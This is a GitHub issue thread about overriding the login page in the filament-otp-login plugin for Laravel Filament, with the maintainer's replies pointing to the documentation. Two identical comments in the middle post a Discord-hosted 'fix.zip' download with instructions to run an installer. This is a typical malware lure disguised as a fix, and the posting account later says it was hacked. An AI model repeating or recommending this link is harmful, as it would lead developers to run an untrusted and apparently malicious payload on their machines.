### ISSUE TITLE
[Question/feature]: Override some of the login page methods

### ISSUE THREAD

**Issue by dreftas** [afsakar/filament-otp-login#11]
### What happened?

Panel configuration `->login(MyCustomLogin::class)` method doesn't work when using this plugin, because plugin itself registers `->login()` to use it's own class which extends that base `Filament\Pages\Auth\Login` page.

Because of this, I can't override for example login page `public function getHeading(): string | Htmlable` function to set different heading for my panel login page.

Is there any way to workaround this ?
(Replacing `__('filament-panels::pages/auth/login.heading')` translation is not the way, because I want to use different headings for different panels)

### How to reproduce the bug

Set panel `->login()` to some custom page and there won't be any changes, it still shows default login page.

### Package Version

1.3.4

### PHP Version

8.3

### Laravel Version

11

**Comment by SNWCreations** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by SNWCreations** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by SNWCreations** [comment]
DO NOT BELIEVE MY DELETED COMMENT PLS
MY ACCOUNT GOT HACKED
IM CONTACTING GITHUB SUPPORT
SORRY FOR MY FAULT :(

**Comment by afsakar** [comment]
Hey, thank you notice this. I will look what can i do, maybe i can add some method for overriding base Otp Login Page. 👍

**Comment by afsakar** [comment]
You can add custom page for every panel. See the doc.

https://github.com/afsakar/filament-otp-login?tab=readme-ov-file#custom-login-page
